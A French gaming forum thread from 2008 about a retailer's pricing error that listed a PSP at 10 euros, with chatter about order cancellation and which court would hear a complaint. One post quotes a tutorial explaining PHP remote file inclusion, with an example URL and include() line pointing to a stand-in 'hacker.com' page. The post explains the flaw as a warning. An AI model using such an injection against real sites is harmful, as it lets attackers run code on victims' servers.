Forums GAMERGEN

Une PSP Slim & Lite White neuve pour seulement 10 euros

Règles du forum
Si vous remarquez un message susceptible d'aller à l'encontre des recommandations dont une partie ou la totalité du contenu ne devrait pas se trouver là, signalez-le à l'équipe de modérateurs en cliquant sur Image.

Toute l'équipe vous souhaite la bienvenue ! Si vous repérez d'éventuelles erreurs qui se seraient glissées dans nos contenus, n'hésitez pas à le signaler dans les commentaires.

Messagepar kenittheretu » 04 Juin 2008, 11:56

Mdr j'ai deja une PsP en CF donc je pourai metre c'est 5 la aussi alors ^^ ( si je les recois ) :wink:
kenittheretu Gamer Débutant

Messagepar cereal95 » 04 Juin 2008, 11:59

Vu le montant du "préjudice" ça sera plutot le juge de proximité non?
Dans ce cas là tu n'es obligé d'être représenté je crois.

Mais brith je crois que Magixien sait mieux que toi ce qu'il a à faire :wink:
cereal95 Gamer Pro
Gamer Pro

Messagepar arsenal77enforce » 04 Juin 2008, 12:05

bravo quel chance mais micromania a déja remodifié le prix qui est de 169€ de retour lol
la grosse boulette
quel dommage que je ne suis pas un chanceux
Avatar de l’utilisateur arsenal77enforce Gamer du Dimanche
Gamer du Dimanche
Prénom: Benjamin
Pays: France

Messagepar Gamhea » 04 Juin 2008, 12:08

Non ce sera un tribunal du commerce. J'y suis aller mercredi dernier avec ma classe c'est trop bien, on voit des vendeurs avec des têtes de fourbes qui ont tentés des sournoiseries auprès des clients ^^

Moi je vous souhaite bonne chance, mais je sais pas du tout si vous la recevrez ...

Wait and bleed....
(slipknot ^^)
Gamhea Gamer du Dimanche
Gamer du Dimanche

Messagepar yoyodu75_1 » 04 Juin 2008, 12:15

C'est 169,99€ snifff :cry: :cry:
Avatar de l’utilisateur yoyodu75_1

Messagepar cereal95 » 04 Juin 2008, 12:23

Si un particulier porte plainte contre un commercant c'est civil ou commercial au choix du particulier, par contre si c'est le commercant qui porte plainte c'est du commercial obligatoirement
cereal95 Gamer Pro
Gamer Pro

Messagepar Dook_1 » 04 Juin 2008, 12:28

Je suis tout a fait d'accord sur le fait que la commande va être annulé, mais vous pouvez toujours râler pour avoir des bons :D

Messagepar krat0s76_1 » 04 Juin 2008, 12:33

A quand la PS3 a 10€ :lol: .
Avatar de l’utilisateur krat0s76_1

Messagepar feca92 » 04 Juin 2008, 12:43

Si tu l'as reçoit prévient nous, j'espere que cette offre se renouvelera ^^(si c'était pas une erreur).
feca92 Gamer Maitre
Gamer Maitre

Messagepar GaaraPauleta » 04 Juin 2008, 12:46

feca92 Wrote:Si tu l'as reçoit prévient nous, j'espere que cette offre se renouvelera ^^(si c'était pas une erreur).

Bien sûr que c'était une erreur. La PSP, lorsqu'ils l'achètent, elle leur coût plus que 10€.

Regarde par toi-même, le lien affiche désormais 169.99€.

++
PS5 Édition Standard - iPhone 13 Pro
Avatar de l’utilisateur GaaraPauleta Gamer Argent
Gamer Argent

Messagepar Elek » 04 Juin 2008, 12:48

alphaprime Wrote:
ludax Wrote:voila un exemple du faite que le site est mal securisé:

clique ici

chercher l'erreur !!!

Une variable $_GET ne doit jamais influer sur le contenu du site, c'est malheureusement une erreur répandue.
Je doute quand même que ca influe sur le prix des produits sur le site de micromania.

Eh ben c'est possible, regarde ceci http://www.siteduzero.com/tuto-3-148-1- ... #ss_part_2

Oui, je crois que des explications s'imposent... Regardez en haut de cette page web, vous pouvez modifier facilement l'url, donc modifier facilement la page qui sera incluse !!! Et vu le code PHP qui a été utilisé, on peut très facilement inclure une page située sur un autre site ! Du coup, en modifiant juste l'url de la page ( http://toto.com/page.php?variable="http://www.hacker.com/pagespeciale.php" ) PHP va exécuter cette instruction :
<?php include("http://www.hacker.com/pagespeciale.php"); ?>

Qu'est-ce qu'on risque ? C'est simple, je n'ai qu'à modifier l'url pour mettre l'adresse d'un fichier PHP sur un FTP à moi, et c'est VOTRE serveur qui exécutera le code de ma page (pagespeciale.php).
Elek Gamer du Dimanche
Gamer du Dimanche

Messagepar angelofskies » 04 Juin 2008, 12:48

Moi j'en prendrai bien une dizaine :D . Mais faudrait voir aussi les frais de port, des que ça depasse 10€ je n'en veux pas, c'est qu'en meme le double du prix .
Avatar de l’utilisateur angelofskies Gamer du Dimanche
Gamer du Dimanche

PrécédenteSuivante

Retourner vers Archives des commentaires de news